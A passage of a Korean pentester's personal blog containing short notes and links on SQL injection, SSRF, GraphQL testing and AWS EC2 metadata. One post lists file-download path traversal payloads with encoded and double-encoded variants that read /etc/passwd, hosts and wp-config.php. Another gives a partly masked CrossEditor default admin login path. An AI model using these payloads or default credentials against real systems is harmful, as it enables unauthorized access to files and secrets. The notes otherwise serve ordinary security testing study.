proxy tool

2021. 11. 17. 13:08

proxy.zip
0.01MB

'' 카테고리의 다른 글

ckeditor release-notes  (0) 2021.12.27
websquare 이하 경로  (0) 2021.12.21
apache tomcat tree  (0) 2021.11.08
overflow error based 확인  (0) 2021.10.27
파일 다운로드 우회 링크  (0) 2021.10.17
블로그 이미지

wtdsoul

,

apache tomcat tree

2021. 11. 8. 17:44

https://stmxcsr.com/micro/tomcat_tree.html

 

Apache Tomcat Directory Tree

Apache Tomcat Directory Tree

stmxcsr.com

 

 

'' 카테고리의 다른 글

websquare 이하 경로  (0) 2021.12.21
proxy tool  (0) 2021.11.17
overflow error based 확인  (0) 2021.10.27
파일 다운로드 우회 링크  (0) 2021.10.17
그누보드 cheditor 건  (0) 2021.10.12
블로그 이미지

wtdsoul

,

overflow error based 확인

2021. 10. 27. 20:29

https://www.exploit-db.com/docs/english/37733-bigint-overflow-error-based-sql-injection.pdf

 

 

 

https://titanwolf.org/Network/Articles/Article?AID=c38bf9ea-d8de-41b6-bf61-4ac39ad98102

'' 카테고리의 다른 글

proxy tool  (0) 2021.11.17
apache tomcat tree  (0) 2021.11.08
파일 다운로드 우회 링크  (0) 2021.10.17
그누보드 cheditor 건  (0) 2021.10.12
cross editor default password  (0) 2021.10.10
블로그 이미지

wtdsoul

,

* 파일 다운로드 경로 우회

 

 1) 파일 다운로드 경로

  ../../../../etc/passwd
  ../../../../etc/hosts
  ../../../../winnt/win.ini
  ../../../../boot.ini
  ../../../../wp-config.php

 

 2) 인코딩

  ../../../../etc/passwd
  %2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64

  ../../../../../../../../../etc/hosts
  인코딩 %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%68%6f%73%74%73
  더블 인코딩 %252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2fetc%2fhosts
 

 3) 전자정부 표준프레임워크 사용

  imageSrc.do?path=/....//....//....//....//....//....//....//....//....//....//etc/&physical=passwd

 
 4) 그 외

  passwd %70%61%73%73%77%64

  16bit 유니코드인코딩 .(%u002e), /(%u2215), \(%u2216)

  더블URL 인코딩 .(%252e), /(%252f), \(%255c)

  유닉스 ../../../../etc/passwd%0a.jpg > 개행문자(%0a)를 삽입 가능

 



https://itinformation.tistory.com/46

 

파일 다운로드 우회 정리

* 파일 다운로드 경로 우회  1) 파일 다운로드 경로 ../../../../etc/passwd ../../../../etc/hosts ../../../../winnt/win.ini ../../../../boot.ini ../../../../wp-config.php  2) 인코딩 ../../../../etc/pa..

itinformation.tistory.com

 

'' 카테고리의 다른 글

apache tomcat tree  (0) 2021.11.08
overflow error based 확인  (0) 2021.10.27
그누보드 cheditor 건  (0) 2021.10.12
cross editor default password  (0) 2021.10.10
graphql 모의해킹 수행 (진행 중)  (2) 2021.09.08
블로그 이미지

wtdsoul

,

그누보드 cheditor 건

2021. 10. 12. 03:29

https://webhack.dynu.net/?idx=20170130.001

'' 카테고리의 다른 글

overflow error based 확인  (0) 2021.10.27
파일 다운로드 우회 링크  (0) 2021.10.17
cross editor default password  (0) 2021.10.10
graphql 모의해킹 수행 (진행 중)  (2) 2021.09.08
EC2 meta data 인스턴스  (0) 2021.08.31
블로그 이미지

wtdsoul

,

cross editor default password

2021. 10. 10. 02:43

 

/crosseditor/manage/index.html

기본은 adm**/1**4

 

 

'' 카테고리의 다른 글

파일 다운로드 우회 링크  (0) 2021.10.17
그누보드 cheditor 건  (0) 2021.10.12
graphql 모의해킹 수행 (진행 중)  (2) 2021.09.08
EC2 meta data 인스턴스  (0) 2021.08.31
a-pentesters-guide-to-server-side-request-forgery-ssrf  (0) 2021.08.30
블로그 이미지

wtdsoul

,

https://imjuno.com/page/2/

 

임준오의 블로그

제 삶을 글로 씁니다

imjuno.com

 

https://www.hahwul.com/2019/06/23/graphqlmap/

 

GraphQLmap - testing graphql endpoint for pentesting & bugbounty

밤에 트윗보다보니 swissky가 툴 하나를 만들어서 배포했더군요. 심지어 GraphQL 관련 자동화도구라 바로 대충 정리해서 포스팅해봅니다. GraphQLmap 입니다. 아 swissky는 Payload All the Things을 만든.. 대단

www.hahwul.com

 

 

https://jonnung.dev/graphql/2019/08/05/python-graphql-graphene-tutorial/

 

조은우 개발 블로그

 

jonnung.dev

 

https://github.com/swisskyrepo/GraphQLmap

 

GitHub - swisskyrepo/GraphQLmap: GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes.

GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes. - GitHub - swisskyrepo/GraphQLmap: GraphQLmap is a scripting engine to interact with a graphql endpoint...

github.com

 

'' 카테고리의 다른 글

그누보드 cheditor 건  (0) 2021.10.12
cross editor default password  (0) 2021.10.10
EC2 meta data 인스턴스  (0) 2021.08.31
a-pentesters-guide-to-server-side-request-forgery-ssrf  (0) 2021.08.30
AWS API 호출하기 (1) – 개론편  (0) 2021.08.30
블로그 이미지

wtdsoul

,

EC2 meta data 인스턴스

2021. 8. 31. 16:47

https://novemberde.github.io/aws/2017/11/06/Instance_metadata.html

 

Khbyun's blog

Novemberde's dev

novemberde.github.io

 

Summary


Amazon EC2의 설정을 자동으로 하기 위해선 인스턴스의 정보를 받아와서 설정할 수 있어야 한다.

예를 들어 특정 태그로 묶인 그룹에게 재가동시 소스코드 갱신과 서버 재가동의 명령어를 init.d에 등록했을 때 인스턴스 정보를 얻어온다면 개별적으로 인스턴스의 역할에 맞는 work load를 할당할 수 있을 것이다.


meta-data 확인하기


Metadata에 대해서 찾아보니 위키백과에 아래와 같이 쓰여 있었다.

  • 메타데이터(metadata)는 데이터(data)에 대한 데이터이다. 이렇게 흔히들 간단히 정의하지만 엄격하게는, Karen Coyle에 의하면 “어떤 목적을 가지고 만들어진 데이터 (Constructed data with a purpose)”라고도 정의한다. 가령 도서관에서 사용하는 서지기술용으로 만든 것이 그 대표적인 예이다. 지금은 온톨로지의 등장과 함께 기계가 읽고 이해할 수 있는 (Machine Actionable)한 형태의 메타데이터가 많이 사용되고 있다.

이 뜻을 인스턴스에 대입해보면, 인스턴스에 대한 데이터라고 생각해볼 수 있다.

여기에는 인스턴스가 가지고 있는 intance-id값과 같이 인스턴스의 특성을 알 수 있는 값들이 있을 것이다.

아래와 같이 예제를 통해 인스턴스의 Meta-data를 받아 본다.

169.254.169.254 라는 IP는 인스턴스의 정보를 받아 볼 수 있는 IP이다. 이 IP를 통해 정보를 받는다.

$ curl http://169.254.169.254/latest/meta-data/ ami-id ami-launch-index ami-manifest-path block-device-mapping/ hostname instance-action instance-id instance-type local-hostname local-ipv4 mac metrics/ network/ placement/ profile public-hostname public-ipv4 public-keys/ reservation-id security-groups services/ # 인스턴스의 ami id $ curl http://169.254.169.254/latest/meta-data/ami-id ami-ccccccccc # 인스턴스의 Security group $ curl http://169.254.169.254/latest/meta-data/security-groups my-security-group1 my-security-group2 # 인스턴스의 Role 정보 $ curl http://169.254.169.254/latest/meta-data/iam/info { "Code" : "Success", "LastUpdated" : "2017-11-05T13:34:37Z", "InstanceProfileArn" : "arn:aws:iam::111111111:instance-profile/my-instance-role", "InstanceProfileId" : "AAAAAAAAAAAAAA" }


고찰


지금까지 인스턴스의 정보를 받아보았다. 169.254.169.254에 get 요청을 하면 받는 인스턴스 정보를 특정하여 받아볼 수 있는데, 이는 활용하는 사람에 따라 다양하게 적용할 수 있을 것이다.

먼저 Security Group의 정보를 받을 경우에는 인스턴스가 가동할 때 원하는 Security-Group이 할당여부를 확인할 수 있을 것이다. 또한 Role 을 받아오면 인스턴스의 역할을 명확히 알 수 있기 때문에, 인스턴스의 소스코드를 갱신하여 인스턴스가 재시작 될 때마다 동작해야 할 명령어들을 구분지을 수 있다.

다른 활용 방법을 간단하게 구상해보자. 특정 S3에는 스크립트 파일들을 모아두고 role과 파일명을 일치해둔다. 그리고 AMI를 만드는데 내용은 다음과 같다. 가동될 때 meta-data로 role정보를 받아오면 role과 일치하는 S3버킷의 파일을 받아와 shell 또는 python 등 자신이 자신있는 script로 실행한다. script가 실행되면 각 인스턴스의 역할에 맞는 서버가 가동된다.

이런 식으로 설정을 한다면 Scaling Group이 Scale out이 될 때 큰 걱정없이 배포용 코드로 서버들이 가동될 수 있을 것이다.

 

 

'' 카테고리의 다른 글

cross editor default password  (0) 2021.10.10
graphql 모의해킹 수행 (진행 중)  (2) 2021.09.08
a-pentesters-guide-to-server-side-request-forgery-ssrf  (0) 2021.08.30
AWS API 호출하기 (1) – 개론편  (0) 2021.08.30
Oauth CSRF 대응방안  (0) 2021.08.17
블로그 이미지

wtdsoul

,

https://cobalt.io/blog/a-pentesters-guide-to-server-side-request-forgery-ssrf

 

A Pentester’s Guide to Server Side Request Forgery (SSRF)

Gain insider tips about Server Side Request Forgery (SSRF) with the Pentester’s Guide to SSRF, written by cybersecurity expert Busra Demir from Cobalt.

cobalt.io

 

 

 

'' 카테고리의 다른 글

graphql 모의해킹 수행 (진행 중)  (2) 2021.09.08
EC2 meta data 인스턴스  (0) 2021.08.31
AWS API 호출하기 (1) – 개론편  (0) 2021.08.30
Oauth CSRF 대응방안  (0) 2021.08.17
Line Notify  (0) 2021.08.16
블로그 이미지

wtdsoul

,

https://aws.amazon.com/ko/blogs/korea/aws-api-call-1/

 

AWS API 호출하기 (1) – 개론편 | Amazon Web Services

애플리케이션을 구동하기 위한 환경을 얻기까지 전통적인 데이터센터 환경에서 관리자는 거의 모든 작업을 수동으로 수행합니다. 관리자와 운영자는 서버, 스토리지 및 네트워크와 같은 인프

aws.amazon.com

 

AWS 환경에서 모의해킹 업무가 늘어나면서 해당 정보를 하나씩 작성함

'' 카테고리의 다른 글

EC2 meta data 인스턴스  (0) 2021.08.31
a-pentesters-guide-to-server-side-request-forgery-ssrf  (0) 2021.08.30
Oauth CSRF 대응방안  (0) 2021.08.17
Line Notify  (0) 2021.08.16
oauth jwt 차이  (0) 2021.07.27
블로그 이미지

wtdsoul

,